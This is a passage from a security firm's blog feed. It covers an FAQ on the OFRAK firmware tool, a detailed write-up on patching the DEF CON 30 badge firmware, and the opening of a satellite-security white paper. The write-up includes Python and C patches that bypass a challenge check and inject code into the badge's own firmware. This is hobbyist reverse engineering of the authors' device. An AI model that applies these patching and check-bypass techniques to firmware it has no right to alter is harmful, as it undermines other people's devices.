Furthermore, OFRAK provides a unified interface for interacting with other powerful tools. For example, OFRAK provides a common disassembler interface that allows engineers to switch between supported disassemblers (angr, Binary Ninja, Capstone, Ghidra, IDA Pro). Similarly, the OFRAK PatchMaker provides a common interface for interacting with various assemblers, compilers and toolchains. These common interfaces enable engineers to easily switch between disassemblers, assemblers, and toolchains without having to rewrite their business logic. This flexibility helps save money when the constraints or a project require using a particular tool.

“Oftentimes, it’s cost prohibitive for organizations to hire reverse engineers with specialized skills to patch embedded devices.” Automating the application of a fix turns out to be a hard computer science problem with fundamental research challenges. These challenges must be supported with new classes of modular, community-building, research-enabling tools such as OFRAK.”

“Oftentimes, it’s cost prohibitive for organizations to hire reverse engineers with specialized skills to patch embedded devices.” Automating the application of a fix turns out to be a hard computer science problem with fundamental research challenges. These challenges must be supported with new classes of modular, community-building, research-enabling tools such as OFRAK.”

5. Will OFRAK affect the functionality of the firmware’s host device?

Not if it’s being used responsibly. This is where OFRAK’s modular component design – which breaks unpacking, modification, and packing into discrete steps – is important. OFRAK’s component architecture allows engineers to chain together tested and verified unpackers, modifiers, and packers in a safe way. This reduces the likelihood of introducing unintended changes into a firmware binary.

6. OK, but is OFRAK actually for experienced engineers?

OFRAK is for any serious student or practitioner of reverse engineering. Every reverse engineer begins as a student or as a curious self-starter. RBS is committed to a process that will train the next generation of engineers. This is why OFRAK is free to individuals who are learning in an academic program or on their own.

7. So, is OFRAK open-sourced?

Technically, no. OFRAK is source-available, but not open source. The code in OFRAK’s GitHub repository comes with the OFRAK Community License, which is intended for educational use, personal development, or just having fun. Users interested in using OFRAK for commercial purposes can learn more at ofrak.com/license. Free 6-month trials of the OFRAK Pro License are available for a limited time.

To learn more about Red Balloon Security‘s offers, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/ofrak-a-boon-to-the-security/feed/ 0 7465
DEF CON 30 Badge Fun with OFRAK https://redballoonsecurity.com/def-con-30-badge-fun-with-ofrak/ Wed, 24 Aug 2022 18:01:28 +0000 https://redballoonsecurity.com/?p=7215

DEF CON 30 Badge Fun with OFRAK

The TL;DR? We used OFRAK to rewrite the badge firmware so that it auto-plays the solution for Challenge 1.

Est. read time: 20 min read

The code referenced in this writeup can be found here.

 

 

DEF CON 30 just ended, and the badge this year was awesome. It included a playable synthesizer with a few instrument presets, as well as buttons, a screen, and a small speaker. Everything on the badge was driven by a Raspberry Pi Pico. As usual, the badge also had an associated reverse engineering challenge.

 

 

Several of us from Red Balloon Security attended and manned  booths in the Aerospace Village and Car Hacking Village. Many of our demos were based on OFRAK, which we released publicly at DEF CON 30. Since OFRAK is a binary reverse engineering and modification platform, it naturally became our tool of choice for badge firmware modification.

 

 

This post walks through using OFRAK to modify the DEF CON 30 Badge firmware in fun and exciting ways. We are unabashedly building off of this great write-up@reteps, we owe you a beer! (Or a ginger ale, since it seems like you may not be old enough to drink just yet.)

 

This write-up is long, so feel free to skip ahead to the parts that interest you:

Table of Contents

Set up OFRAK

To walk through this writeup with us, you will need to install picotool and ofrak. Run these steps in the background while you read the rest of this document.

For this writeup, we used the redballoonsecurity/ofrak/ghidra Docker image.

  1. Make sure you have Git LFS set up.

    which git-lfs || sudo apt install git-lfs || brew install git-lfs
    git lfs install
  2. Clone OFRAK.

    git clone https://github.com/redballoonsecurity/ofrak.git
    cd ofrak
  3. Install Docker.

  4. Build an OFRAK Docker image with Ghidra. This will take several minutes the first time, but should be quick to rebuild later on. Continue reading and come back when it is finished!

    # Requires pip
    python3 -m pip install --upgrade PyYAML
    
    DOCKER_BUILDKIT=1 \
    python3 build_image.py --config ./ofrak-ghidra.yml --base --finish

    Check it is installed by looking for redballoonsecurity/ofrak/ghidra near the top of the output of the following command.

    docker images
  5. Run an OFRAK Docker container. These instructions have more information about running OFRAK interactively.

    mkdir --parents ~/dc30_badge
    
    docker run \
      --rm \
      --detach \
      --hostname ofrak \
      --name ofrak \
      --interactive \
      --tty \
      --publish 80:80 \
      --volume ~/dc30_badge:/badge \
      redballoonsecurity/ofrak/ghidra:latest
  6. Check that it works by going to http://localhost. You should see the OFRAK GUI there.

We use picotoolto export the firmware image.

  1. Install the dependencies. For example, on Ubuntu:

    sudo apt install build-essential pkg-config libusb-1.0-0-dev cmake make
    
    git clone https://github.com/raspberrypi/pico-sdk.git
    git clone https://github.com/raspberrypi/picotool.git
  2. Build picotool.

    pushd picotool
    mkdir --parents build
    cd build
    PICO_SDK_PATH=../../pico-sdk cmake ..
    make -j
    sudo cp picotool /usr/local/bin/
    popd

You can now use picotool to export the firmware image from the device. To do this, the badge must be in BOOTSEL. To put the badge in BOOTSEL, hold down the badge’s down button while powering the device, or short the J1 pins on the back with a jumper wire. You can now connect the device to your computer over micro USB.

If you have done this correctly, running picotool should give the following output:

				
					$ sudo picotool info -a
Program Information
 name:          blink
 description:   DEF CON 30 Badge
 binary start:  0x10000000
 binary end:    0x100177cc

Fixed Pin Information
 0:   UART0 TX
 1:   UART0 RX
 25:  LED

Build Information
 sdk version:       1.3.0
 pico_board:        pico
 boot2_name:        boot2_w25q080
 build date:        Jul 17 2022
 build attributes:  Debug

Device Information
 flash size:   2048K
 ROM version:  3
				
			

You can now dump the badge firmware as a raw binary file, badge_fw.bin, using the following command:

				
					mkdir --parents ~/dc30_badge
sudo picotool save -a -t bin ~/dc30_badge/badge_fw.bin
				
			

Insert logo with OFRAK GUI

First things first – let’s replace the DEF CON logo that appears when the badge is powered on with an OFRAK logo!

1. Load the image into the OFRAK GUI.

2. We know from the reteps writeup that the DEF CON logo is at offset 0x13d24, so we can use the “Carve Child” feature in the OFRAK GUI to unpack it as a separate resource.

 

Carve from offset 0x13d24 with a size of 80 by 64 pixels, each of which is stored in a single bit (so divide by 8 to get the number of bytes).

3. Download the child and verify that it’s the correct range by loading it in GNU Image Manipulation Program (GIMP).

Looks good!

 

4. Download this pre-built OFRAK Logo from here, or expand more information about building a custom image below.

  1. For making a custom image, first, create a new canvas and load your image as a layer resized for the canvas.


  2. Load your image, and resize it and invert the colors if necessary. The OFRAK Logo is a great candidate image.


  3. Convert the image to 1-bit color depth with dithering. (For more about dithering, check out this article.)




  4. Merge all the layers into one by right-clicking in the layers pane on the left.




  5. Export the image with Ctrl+Shift+E (Cmd on Mac), or use File > Export As.... Pick PNG.



  6. Convert the PNG to raw 1-bit data with ImageMagick, based on the instructions here.

    # Install ImageMagick if you don't have it
    which convert || sudo apt install imagemagick || brew install imagemagick
    
    # Convert the image
    convert myimage.png -depth 1 GRAY:shroomscreen.bin
    
    # Verify that it is 640 bytes
    wc -c shroomscreen.bin

5. Use the OFRAK GUI “Replace” feature to replace the data.

6. Pack the whole thing back up.

7. Download the resulting firmware image and flash it onto the device.

				
					cp "$(ls -rt ~/Downloads | tail -n 1)" ~/dc30_badge/ofrakked.bin
sudo picotool load ~/dc30_badge/ofrakked.bin

				
			

8. Verify that it works by booting up the badge.

Looks good!

We can now automate this step in future firmware mods by using the following Python function:

				
					async def ofrak_the_logo(resource: Resource):
      """
      Replace the DEF CON logo with OFRAK!
      """
      logo_offset = 0x13d24
      ofrak_logo_path = "./shroomscreen.data"
      with open (ofrak_logo_path, "rb") as f:
          ofrak_logo_bytes = f.read()
      resource.queue_patch(Range.from_size(logo_offset, len(ofrak_logo_bytes)), ofrak_logo_bytes)
      await resource.save()
				
			

Change some strings

It is easy to use OFRAK to change strings within the badge firmware. The function ofrak_the_strings (listed below) changes the “Play” button on the badge’s menu to display “OFRAK!” and hijacks the credits, giving credit to OFRAK mascots (“mushroom”, “caterpillar”) and “rbs.”

				
					async def ofrak_the_strings(resource: Resource):
        """
        Change Play menu to OFRAK!

        Update credits to give credit where due
        """
        # First, let's overwrite Play with "OFRAK!"
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "Play",
                "OFRAK!",
                True,
                True
            )
        )
        # Let's overwrite credits with OFRAK animal names
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "ktjgeekmom",
                "mushroom",
                True,
                False
            )
        )
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "compukidmike",
                "caterpillar",
                True,
                False
            )
        )
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "redactd",
                "rbs",
                True,
                False
            )
        )
				
			

Press any key to win Challenge 1

OK, now on to Challenge 1! For those of you who didn’t participate in BadgeCon: You win Challenge 1 on the DEF CON Badge if you play the melody to Edward Grieg’s Peer Gynt.

 

Peer Gynt is nice, but some of us can’t play the piano (or are too lazy). We want to win Challenge 1 without any musical skills/effort.

 

The reteps writeup points us to a two-byte binary patch that does just that. The ofrak_challenge_one function below patches the badge firmware such that pressing any key wins Challenge 1!

				
					async def ofrak_challenge_one(resource: Resource):
      """
      Win challenge 1 by pressing any key!
      """
      check_challenge_address = 0x10002DF0
      win_address = 0x10002E20
      jump_asm = f"b {hex(win_address)}"
      jump_bytes = await assembler_service.assemble(
          jump_asm, check_challenge_address + 4, ARCH_INFO, InstructionSetMode.THUMB
      )

      await resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig([(0x10002DF0 + 4, jump_bytes)]),
      )
				
			

You’re welcome.

Autoplay Notes (Piano Player) to win Challenge 1

Jumping right to the win condition is fun and all, but isn’t half the fun of the badge that it makes sounds? What if we could just have it… make sounds? Sounds that happen to make us win?

 

The goal of this section is to use OFRAK to patch the badge firmware into “Player Piano” mode: When you start Challenge 1, the badge autoplays Peer Gynt for you and you win. This is not too complicated, but it requires us to put on our Reverse Engineer hats and dig deeper into the firmware.

 

Step 1: Reverse Engineering

The first step was to pull the firmware and throw it into Ghidra. Luckily, we didn’t have to start from scratch.

 

Step 0: Plagiarize Survey the Literature

Shoutout (again) to the reteps writeup, which was a great starting point. If he shared his Ghidra project, we didn’t see it, but in his writeup we could see one important function labeled and with a full address! What he called z_add_new_note_and_check at 0x10002df0, we called check_challenge, but it does the same thing either way. That was essentially our starting point, from which all other analysis stemmed.

Step 1v2: Reverse Engineering

Our first approach was looking at code xrefs to check_challenge since A) that was our foothold and we did not have any other good starting points, and B) the latest note played was passed to this function, so it seemed to make sense to trace that data flow and find out how the latest note played is read. Then, in theory, we could write a new note there programmatically. The immediate problem was that most usages of check_challenge were in a function we affectionately called big_chungus because it was large and hard to understand. The decompilation looked like this:

Which was essentially unusable except in very local instances.

 

The next approach we took was looking at strings. We quickly found some interesting strings we had seen on the screen, so we followed those references and found a number of functions related to drawing pixels (below screenshot shows them after they were labeled):

This led to the functions that drew each of the menus, which gave us a good idea of the state machine that the firmware uses. Throughout the process, we used OFRAK to experiment with different hypotheses by injecting bits of assembly to poke at addresses. For example:

				
					async def overwrite_state_pointers(resource):
    # Effect: main menu does not change image when i move to different options
    # (they are still selected, as we can click through them)
    new_state_pointer_bytes = struct.pack("<i", 0x1000544c)
    resource.run(
        BinaryInjectorModifier,
        BinaryInjectorModifierConfig(
            [
                (0x1000e1a0, new_state_pointer_bytes),
                (0x1000e1a4, new_state_pointer_bytes),
                (0x1000e1a8, new_state_pointer_bytes),
                (0x1000e1ac, new_state_pointer_bytes),
                (0x1000e1b0, new_state_pointer_bytes),
            ]
        ),
    )
    
    
async def main(ofrak_context):
    root_resource = await ofrak_context.create_root_resource_from_file(BADGE_FW)
    
    root_resource.add_tag(Program)
    root_resource.add_attributes(arch_info)
    root_resource.add_view(MemoryRegion(START_VM_ADDRESS, FIRMWARE_SIZE))

    await root_resource.save()

    await overwrite_state_pointers(root_resource)
    
    # And other experiments...

    await root_resource.save()
    await root_resource.flush_to_disk(OUTPUT_FILE)
				
			

This helped us to confirm or reject these hypotheses. It was also just fun to change the behavior. We used this function to change all of the keys’ associated light colors to green, since the code for that is all in a big regularly-patterned block and we could iterate over it at constant offsets:

				
					async def set_all_key_lights(resource, rgb):
      first_color_load_vaddr = 0x10004cf0
      color_loads_offset = 0xe

      set_red_instr = f"movs r0, #0x{rgb[0]:x}"
      set_green_instr = f"movs r1, #0x{rgb[1]:x}"
      set_blue_instr = f"movs r2, #0x{rgb[2]:x}"

      mc = await assembler_service.assemble(
          "\n".join([set_blue_instr, set_green_instr, set_red_instr]),
          first_color_load_vaddr,
          arch_info,
          InstructionSetMode.THUMB,
      )
      
      resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig(
              [
                  (color_load_vaddr, mc)
                  for color_load_vaddr in range(first_color_load_vaddr, 0x10004dc2, color_loads_offset)
              ]
          ),
      )
				
			

After mucking around for a while, we were not completely sure we had found the “source” of the notes. We had some ideas, though they would require more complex experiments, which would be cumbersome to write in assembly. At this point, we decided to set up the OFRAK PatchMaker for the badge firmware.

Step 2: PatchMaker

The PatchMaker is a Python package for building code patch blobs from source and injecting them into an executable OFRAK resource. In this case, we wanted to be able to “mod” the badge firmware by just writing out some C code with full access to the existing functions and data already in the device.

 

The first step is to set up the toolchain configuration:

				
					
TOOLCHAIN_CONFIG = ToolchainConfig(
    file_format=BinFileType.ELF,
    force_inlines=False,
    relocatable=False,
    no_std_lib=True,
    no_jump_tables=True,
    no_bss_section=True,
    compiler_optimization_level=CompilerOptimizationLevel.SPACE,
    check_overlap=True,
)
TOOLCHAIN_VERSION = ToolchainVersion.GNU_ARM_NONE_EABI_10_2_1
				
			

This is pretty standard stuff for C-patching an existing firmware. We decided to use the PatchFromSourceModifier to do that actual patching, as it hides some of the nitty-gritty of building a patch (though it consequently has fewer options than going through the core PatchMaker API).

The next step is to define the symbols that can be used from the patch source code. These need to be exposed to PatchMaker by adding some LinkableSymbol data structure to the existing Program:

				
					LINKABLE_SYMBOLS = [
    # Existing variables in binary
    LinkableSymbol(0x20026eea, "notes_held_bitmap", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x200019d8, "octave", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x20001991, "most_recent_note_played", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x200063d8, "notes_played", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x20026f01, "instrument", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),

    # Existing functions in binary
    LinkableSymbol(0x10005074, "draw_rect_white", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),
    LinkableSymbol(0x10004fc4, "write_character", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),
    LinkableSymbol(0x1000503c, "write_text", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),

]

# ... Then later add to resource with:

await resource.run(
        UpdateLinkableSymbolsModifier,
        UpdateLinkableSymbolsModifierConfig(tuple(LINKABLE_SYMBOLS)),
    )
    

				
			

And they need to be exposed to the C code by declarations, as one might normally see in a header:

				
					#include <stdint.h>

extern uint16_t notes_held_bitmap;
extern uint8_t octave;
extern uint8_t most_recent_note_played;
extern uint8_t notes_played[];
extern uint8_t instrument;

extern void draw_rect_white(unsigned int x, unsigned int y, unsigned int x_end, unsigned int y_end);
extern void write_character(char c, int x, int y, int color); // 0=white, 1=black
extern void write_text(const char* str, int x, int y, int color); // 0=white, 1=black
				
			

Then we could write some C code referencing those; no spoilers though, we’ll show that code later! To actually build it, we create an empty root resource to hold the source code and run PatchFromSourceModifier:

				
					async def patch_in_function(ofrak_context, root_resource: Resource):
      """
      Patch in the auto-player that plays the sequence to solve challenge 1.
      """
      # Not strictly necessary, but nice to really clear all "free space"
      await overwrite_draw_volume_info(resource)

      source_bundle_r = await ofrak_context.create_root_resource(
          "", b"", tags=(SourceBundle,)
      )
      source_bundle: SourceBundle = await source_bundle_r.view_as(SourceBundle)
      with open(PATCH_SOURCE, "r") as f:
          await source_bundle.add_source_file(f.read(), PATCH_SOURCE)

      await resource.run(
          UpdateLinkableSymbolsModifier,
          UpdateLinkableSymbolsModifierConfig(tuple(LINKABLE_SYMBOLS)),
      )

      await resource.run(
          PatchFromSourceModifier,
          PatchFromSourceModifierConfig(
              source_bundle_r.get_id(),
              {
                  PATCH_SOURCE: (
                      Segment(
                          ".text",
                          DRAW_VOLUME_RANGE.start,
                          0,
                          False,
                          DRAW_VOLUME_RANGE.length() - 0x50,
                          MemoryPermissions.RX,
                      ),
                      Segment(
                          ".rodata",
                          DRAW_VOLUME_RANGE.end - 0x50,
                          0,
                          False,
                          0x50,
                          MemoryPermissions.R,
                      ),
                  ),
              },
              TOOLCHAIN_CONFIG,
              TOOLCHAIN_VERSION,
          ),
      )
				
			

The source bundle resource ID, the TOOLCHAIN_CONFIG, and TOOLCHAIN_VERSION were already explained but what about the Segments?

 

Step 3: Free Space & Segments

 

In order to inject code, we obviously need a location to inject it into. There are three options for how to obtain this:

 

  1. Find some unused space in the binary.
  2. Enlarge/extend the firmware binary so more bytes are loaded into memory.
  3. Replace something that already exists in the binary.

 

These are roughly ordered from “best” to “worst.” Ideally we want to change as little possible in the binary. In this situation though, we were limited to the third option:

 

  1. We did not have complete knowledge of the binary and could not say with 100% confidence that some part was unused (this is usually the case).
  2. We did not yet have an OFRAK packer/unpacker for uf2, the file format the binary was in.

 

So the next task was to choose something to overwrite. We found the function that drew the little volume slider on the side, and this seemed a good choice because:

 

  • It would free up a decent amount of space (over 256 bytes to drop THUMB code in).
  • It was called often and consistently (alongside other screen-updating code).
  • Removing it would give us some real estate on the right edge of the screen to write/draw new stuff to!

 

We verified that this would have no ill effects by gutting the contents of the function with nop instructions:

				
					async def overwrite_draw_volume_info(resource):
      """
      Creates free space! But you no longer get to see the current volume and the nice arrows
      telling you which way to adjust it.
      """
      # Creates free space! But you no longer get to see the current volume
      # and the nice arrows telling you you can adjust it

      return_instruction = await assembler_service.assemble(
          "mov pc, lr",
          DRAW_VOLUME_RANGE.end - 2,
          ARCH_INFO,
          InstructionSetMode.THUMB,
      )

      nop_sled = await assembler_service.assemble(
          "\n".join(
              ["nop"] * int((DRAW_VOLUME_RANGE.length() - len(return_instruction)) / 2)
          ),
          DRAW_VOLUME_RANGE.start,
          ARCH_INFO,
          InstructionSetMode.THUMB,
      )

      final_mc = nop_sled + return_instruction
      assert len(final_mc) == DRAW_VOLUME_RANGE.length()

      await resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig([(DRAW_VOLUME_RANGE.start, final_mc)]),
      )
				
			

If we are just patching in some compiled C patch over the existing code, NOPing it out first isn’t strictly necessary, but it is a good sanity check that removing the function is probably fine. It also verifies the function does what we think it does: The volume slider is gone!

With our target address picked out, we defined the PatchMaker Segments where our compiled code and data would be inserted:

				
					Segment(
    ".text",
    DRAW_VOLUME_RANGE.start,
    0,
    False,
    DRAW_VOLUME_RANGE.length() - 0x50,
    MemoryPermissions.RX,
),
Segment(
    ".rodata",
    DRAW_VOLUME_RANGE.end - 0x50,
    0,
    False,
    0x50,
    MemoryPermissions.R,
),

				
			

The first is for the code, and the second is a healthy allocation for read-only data, like constants and strings.

At this point we were ready to start writing some C.

Step 4: The Payload

We wrote a number of experiments in C code, experimenting with various memory addresses and functions we were investigating. C is brilliant because it is so much nicer to work in than assembly, but just as unsafe. One trick we used liberally was the ability to cast memory locations to whatever pointer type we wanted: this allowed us to quickly iterate and peek/poke addresses that we thought contained interesting data Here are some snippets from our experiments:

				
					char instrument = *((char*) 0x20026f01);
write_character(instrument + 0x30 , 0x70, 12, 0);

char most_recent_c = most_recent_note_played;  // is an index form, not the actual note string
write_character(most_recent_c, 0x70, 22, 0);

write_character(notes_played[0x2d - 1], 0x7a, 22, 0);


int button_held = *((int*) 0xd0000004);
// Just copying the Ghidra decomp for these comparisons
// It's easier than thinking about which bit is being checked
if (-1 < (button_held << 0x10)) {
    write_character('U', 0x70, 22, 0);
}
if (-1 < (button_held << 0xf)) {
    write_character('D', 0x70, 22, 0);
}
else if (-1 < (button_held << 0xe)) {
    write_character('L', 0x70, 22, 0);
}
else if (-1 < (button_held << 0xd)) {
    write_character('R', 0x70, 22, 0);
}

				
			

This writes out the index of the currently selected instrument, and below that draws the two most recently played notes.

The characters drawn (“@”, “<“) representing the notes just happen to be ASCII; they are uint8_t indexes in essentially a long array of all possible notes in all octaves, so 84 values. G# in the lowest octave is the first visible “character”, at 0x20 meaning ” ” (space), below this the draw_character function just draws a white rectangle. Then B in the highest octave is the highest byte, 0x6B (“k”). Here “@” and “<” mean the most recent notes played are E and C in the 4th octave.

 

Recall that write_character is a function analyzed from the existing binary, and we can call it and link against it like writing normal C code! This is the power of PatchMaker.

 

At this point we had a good loop: Follow some code and/or data in Ghidra for a while until we think we understand it, then write a C patch to use that knowledge to test our theory. After a little bit, we had found a bitmap at 0x20026eea that seemed to store the info about which keys were currently held; some experiments confirmed this. At this point, we had all the information we needed to write a “Player Piano” for the badge!

 

Step 5: Forward Engineering

 

After all the reverse engineering, there were a few “forward” engineering challenges to consider, so we’ll just rapid fire through them:

 

Timing

We wanted the notes to be audible one after the other, so that meant we had to time them. We didn’t find any timing functions, and probably would not “trust” them even if we did. We decided to just use a counter we would increment each time our function was called (like a C static local variable) and play/increment notes according to that. This meant we needed some R/W space, which we implemented quick & dirty by finding some free scratch space and defining pointers to those as LinkableSymbols.

 

We got the addresses by going to the memory segment we had defined in Ghidra for in-memory RW data, and finding the address at which we stopped seeing references. Luckily this was 0x20026f04, not near an obvious page-end boundary, so we felt reasonably confident we could read/write to it as much as we wanted. Then we defined the LinkableSymbols for it:

				
					FREE_SCRATCH_SPACE = 0x20026f04
...

# Added these to the UpdateLinkableSymbolsModifierConfig shown earlier:

LinkableSymbol(FREE_SCRATCH_SPACE, "counter", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),
LinkableSymbol(FREE_SCRATCH_SPACE + 0x8, "seq_i", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),
LinkableSymbol(FREE_SCRATCH_SPACE + 0x10, "state", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),

				
			

In C we could use those as extern r/w variables:

				
					extern int counter;
extern int seq_i;
extern int state;

...

counter += 1;
    
    
if (counter >= NOTE_PERIOD) {
    seq_i += 1;
    if (seq_i >= (SEQUENCE_LENGTH + REST_COUNT)){
        seq_i = 0;
    }

    counter = 0;
}
else if (counter >= (NOTE_PERIOD - NOTE_HELD_T) && seq_i < SEQUENCE_LENGTH) {
    // write next note here
}

				
			

Storing and writing the sequence

Since the target we needed to write notes to was a bitmap, where each bit is a single note, it made sense to define each note as the bit in the bitmap it was mapped to. This could either be represented as bit index (i.e. 0x3 means “third bit”) or a bit mask (i.e. 0x8 means “third bit” because the third bit is set). In the end we chose bit index because it was more compact, requiring only one byte per note in the 12 notes (plus 3 samples).

				
					typedef enum {
    C = 0,
    C_SHARP = 1,
    D = 2,
    D_SHARP = 3,
    E = 4,
    F = 5,
    F_SHARP = 6,
    G = 7,
    G_SHARP = 8,
    A = 9,
    A_SHARP = 11,
    B = 13,
    SAMPLE_1 = 10,
    SAMPLE_2 = 12,
    SAMPLE_3 = 14,
} note_bit_type;

#define NOTE(bit_idx) (0x1 << bit_idx)
#define CHORD(x, y, z) (NOTE(x) | NOTE(y) | NOTE(z))
				
			

Then, we could store the correct sequence as a constant and iterate over that. The correct sequence could be found in memory (in the octave-offset representation we explained in the earlier Payload section) at address 0x1000dac8 (thanks again to reteps for finding this.) Converted to our C enums:

				
					const note_bit_type note_sequence[] = {
    G, E, D, C, // C@><
    D, E, G, E, // >@C@
    D, C, D, E, // ><>@
    G, E, G, A, // C@CE
    E, A, G, E, // @EC@
    D, C, G, E, // ><C@
    D, C, D, E, // ><>@
    G, E, D, C, // C@><
    D, E, D, E, // >@>@
    G, E, G, A, // C@CE
    E, A, B, G_SHARP, // @EGD
    F_SHARP, E, // B@
};
				
			

Then to write the note:

				
					note_bit_type next_note_bit = note_sequence[seq_i];
notes_held_bitmap |= NOTE(next_note_bit);

				
			

Starting playing the sequence

Initially, we had the sequence play in a loop forever, as soon as the “Play” menu came up.

 

This got a bit annoying. We had already figured out a few of the other inputs we could use to trigger the sequence, and settled on all three of the samples being played at once when in a specific instrument. Then switching out of that instrument would stop the sequence. This was much better for our sanity. We also added some initialization code for the counters, just to be sure they would start at 0. We wrote some specific magic value to one of our scratch variables to keep track of whether the state was initialized or not. A saner alternative would have been to find the initialization/startup code and hook into that, but this was a bit easier.

				
					if (instrument != AUTOPLAY_INSTRUMENT){
    state = 0x0;
    return;
}

int all_3_samples_held = CHORD(SAMPLE_1, SAMPLE_2, SAMPLE_3);

if (state != 0xed){
    if (!((notes_held_bitmap & all_3_samples_held) ^ all_3_samples_held)){
        counter = 0;
        seq_i = 0;
        state = 0xed;
    }
    else{
        return;
    }
}
   

				
			

We arbitrarily chose the violin as the autoplay instrument.

Closing Thoughts

This was good, fun and an exercise in using OFRAK “recreationally.” We, of course, are partial to OFRAK, but it was great scripting everything in Python and having access to a library of very helpful binary analysis and patching functionality.

 

Some future additions that could be done on this badge FW modification:

 

  • Making the autoplayer a separate “instrument” so it shows up on the instrument select screen. It would be a neat trick, but you’d have to stop the badge from thinking it’s an actual instrument and trying to play sounds that don’t exist (there appear to be jump tables for each instrument)
  • Making multiple new instruments for different pre-set tracks
  • Recording sequences of notes as new pre-set tracks at runtime
  • Using the various drawing functions to draw pictures according to the notes played, like a music visualizer

 

All of these would require rather significant additional space, so we would need a way to extend the firmware for sure. Sit tight for an OFRAK Modifier for that!

 

Some sticking points with OFRAK we noticed that got us thinking:

 

  • It bothered us (aesthetically and practically) that we were defining functions and data in two places: The “extern” declarations in source/header, and the LinkableSymbol that actually defined the value. It seems practical and more convenient to define functions along with their type in one place, perhaps just pulling these straight from Ghidra, and have OFRAK creating the declaration and definition without any more user input needed.
  • Managing data sections (both R and RW) through the PatchFromSourceModifier API is a bit impractical. This can always be tricky with PatchMaker, but the Modifier’s API abstracts away the guts that it is unfortunately necessary to bury your hands in to get things working smoothly. For example, we originally tried to used LLVM instead of GNU, but LLVM stubbornly insisted that extern pointers to data had to first be loaded as an indirect pointer from the .rodata section, which pointed to an address in the .bss section, where the address of the variable would hopefully be contained. GNU was happy to just load the variable address directly from the .rodata section. Managing an additional section was more effort than switching toolchains, which is a testament to interoperability and modularity in PatchMaker but a flaw in PatchFromSourceModifier.

 

Perhaps these will become pull requests you’ll see landing in core OFRAK shortly 🙂

 

Hope you enjoyed our work!  Maybe next you can build something else cool on top of the badge!

 

— Edward Larson & Jacob Strieb

 

]]>
7215
Embedded Systems and Aerospace & Satellite Cybersecurity https://redballoonsecurity.com/embedded-systems-and-aerospace-satellite-cybersecurity/ https://redballoonsecurity.com/embedded-systems-and-aerospace-satellite-cybersecurity/#respond Wed, 01 Jun 2022 19:06:35 +0000 https://redballoonsecurity.com/?p=6981

Red Balloon Security White Paper

 

Defending From Within: Why Embedded Systems Are the Essential to Achieving Space and Satellite Cybersecurity 

Table of Contents:

 

Executive Summary 

 

State of Cybersecurity in Space and Satellite Systems 

The Global Landscape 3 Shaping a Safer Future 

 

RedBalloonSecurity

Investigations 

CyberLeo 2022 
Defend from Within: Symbiote

Embedded Defense for Satellite Base Station Systems 

NyanSat (https://nyan-sat.com) Binary Analysis and Exploration with FRAK 

 

About Red Balloon Security 

Red Balloon Security Offerings: Defend From Within 

Contact Details 

Executive Summary:

Ensuring the cybersecurity of ground stations, communications, and satellite vehicles is one of the most pressing challenges facing the private and public sectors. At a time of tremendous industry growth, it is more imperative than ever that we secure every segment of satellite systems and protect the personnel who depend on their accuracy, speed, and reliability.

 

The Ukrainian conflict has amplified serious questions about cybersecurity at every link in aerospace deployments. Now is the time for manufacturers, governments, and security providers to align with each other on solutions.

 

Red Balloon Security identifies three messages for shaping a safer future for the space infrastructure:

 

1. Don’t miss the threat on the ground for the threat in space.


2. End users, manufacturers and security experts must collaborate on advanced solutions.

3. We must expand regulations to cover embedded systems.

 

Red Balloon Security has built up satellite and aerospace expertise over more than a decade of governmental and commercial engagements, in which we’ve assessed all types of equipment and helped government and industry decision-makers to anticipate and defend against the most serious cyber threats facing our satellite fleets. Our core embedded defense technology, Symbiote, has been deployed by DARPA, the DoD, and DHS, while our experts have contributed to red vs. blue simulations that highlight insecurity in satellite systems — and frequently propose solutions for safer space deployments.

 

There is still time to get aerospace security right, but the longer commercial and government interests wait, the harder it will be to rectify insecure architecture in satellite constellations. To paraphrase a sage from another era, “The best time to plant a tree was 20 years ago.” The next best time to address satellite cybersecurity is now.

State of Cybersecurity in Space and Satellite Systems

The Global Landscape

 

A residual effect of war in Ukraine is that cybersecurity is no longer a sideshow in aerospace, if 2022 space-related trade events are any indication. The conflict has raised awareness and concerns about the security of every link in aerospace deployments. Now is the time for manufacturers, governments, and security providers to align with each other on solutions.

 

Although the initial Russian invasion did not lead to the unrestrained cyber warfare that many people feared, a February 2022 disruption of a satellite network, which was not restricted to Ukraine, added urgency to many conversations. However, while the space industry understands and puts a lot of thought in satellite security, it often lacks actionable next steps. The prevailing sentiment is that bad cyber actors have a jumpstart on governmental and operators and equipment manufacturers.

 

This is problematic on two levels. Aerospace and satellite deployments are mission-critical and indispensable to the growth of many industries and technologies. At the same time, their attack surfaces have also greatly expanded — and without corrective action, security controls will be bolted onto future designs in an insufficient manner, rather than being built into them with foresight and efficiency.

 

The projected expansion of satellite deployments provides a unique opportunity to build mature security solutions into government and commercial deployments. We can expect an exponential increase in the number of Low Earth Orbit (LEO) satellites, as well as the emergence of small GEO satellites. This means more methods of connectivity, in space and on the ground, and a corresponding increase in opportunities for cyber malfeasance. But it also gives system architects the chance to capitalize on a decade’s worth of advances in cybersecurity technology, and to launch hardened, new constellations — provided we take a proactive approach to investment and collaboration.

 

Shaping a Safer Future

 

To help stimulate innovation and partnership, we identify three messages that should gain traction in 2022 and beyond:

 

1. Don’t miss the threat on the ground for the threat in space

